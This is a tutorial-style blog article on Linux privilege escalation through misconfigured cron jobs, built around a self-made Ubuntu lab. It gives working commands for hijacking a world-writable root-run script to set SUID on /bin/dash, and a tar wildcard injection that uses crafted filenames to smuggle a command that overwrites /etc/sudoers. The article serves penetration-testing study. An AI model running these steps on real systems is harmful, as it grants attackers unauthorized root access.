Privilege Escalation

Linux Privilege Escalation by Exploiting Cronjobs

After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn “Privilege Escalation by exploiting Cron Jobs” to gain root access of a remote host machine and also examine how a bad implement cron job can lead to Privilege escalation. If you have solved CTF challenges for Post exploit then by reading this article you will realize the several loopholes that lead to privileges escalation.

For details, you can read our previous article where we had applied this trick for privilege escalation. Open the links given below:

Link1: Hack the Box Challenge: Europa Walkthrough

Link2: Hack the Milnet VM (CTF Challenge)

Table of content

  • Introduction
  • Cron job
  • Crontab syntax
  • Crontab File overwrite
  • Lab Setup (Ubuntu)
  • Exploiting cron job (Kali Linux)
  • Crontab Tar wildcard Injection
  • Lab Setup (Ubuntu)
  • Exploiting cron job (Kali Linux)

Let’s Start!!!

What is a cron job?

Cron Jobs are used for scheduling tasks by executing commands at specific dates and times on the server. They’re most commonly used for sysadmin jobs such as backups or cleaning /tmp/ directories and so on. The word Cron comes from crontab and it is present inside /etc directory.

 

For example:  Inside crontab, we can add the following entry to print apache error logs automatically in every 1 hour.

1 0 * * * printf "" > /var/log/apache/error_log

Crontab File overwrite

Lab Setup for the Poorly configured cron job

 Objective: Set a new job with help of crontab to run a python script which will erase all data from in a particular directory.

Let assume “cleanup” is the directory whose data will be cleared automatically every two minutes. Thus we have saved some data inside /home/cleanup.

mkdir cleanup
cd cleanup
echo "hello friends" > 1.txt
echo "ALL files will be deleted in 2 mints" > 2.txt
echo > 1.php
echo > 2.php
ls

As you can observe from the given image some files are stored inside the cleanup directory.

Now write a python program in any other directory to delete data from inside /home/cleanup and give it all permission.

cd /tmp
nano cleanup.py
#!/usr/bin/env python
import os
import sys
try:
   os.system('rm -r /home/cleanup/* ')
except:
    sys.exit()
chmod 777 cleanup.py

At last schedule a task with help of crontab to run cleanup.py for every 2 minutes.

nano /etc/crontab
*/2 *   * * *   root    /tmp/cleanup.py

Now let’s verify our objectives

chmod 777 cleanup.py
cd /home/cleanup
ls
date
ls
date

Cool!! It is working, as you can see all file has been deleted after two minutes.

Post Exploitation

Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into the victim’s machine through ssh and access non-root user terminal. Execute the following command as shown below.

cat /etc/crontab
ls  -al /tmp/cleanup.py
cat /tmp/cleanup.py

 From the above steps, we notice the crontab is running python script every two minutes now let’s exploit.

There so many methods to gain root access as in this method we enabled SUID bits /bin/dash. It is quite simple, first, open the file through some editor, for example, nanocleanup.py and replace “rm -r /tmp/*” from the following line as given below

os.system('chmod u+s /bin/dash')

After two minutes it will set SUID permission for /bin/dash and when you will run it will give root access.

/bin/dash
id
whoami

Awesome!! We hit the Goal…………………

Crontab Tar Wildcard Injection

Lab Setup

Objective: schedule a task with help of crontab to take backup with tar archival program of HTML directory.

The directory should have executable permission whose backup you are going to take.

Now schedule a task with help of crontab to run tar archival program for taking backup of /html inside /var/backups in every 1 minute.

nano /etc/crontab
*/1 *   * * *   root tar -zcf /var/backups/html.tgz /var/www/html/*

Let’s verify the schedule is working or not by executing following command.

cd /var/backup
ls
date

From given below image you can notice the html.tgz file has been generated after 1 minute.

Post Exploitation

Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into the victim’s machine through ssh and access non-root user terminal. Then open crontab to view if any job is scheduled.

cat /etc/crontab

Here we notice the target has scheduled a tar archival program for every 1 minute and we know that cron job runs as root. Let’s try to exploit.

Execute the following command to grant sudo right to logged user and following post exploitation is known as wildcard injection.

echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *

Now after 1 minute it will grant sudo right to the user: ignite as you can confirm this with the given below image.

sudo -l
sudo bash
whoami

YUPPIEEEE!!! We have successfully obtained root access.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here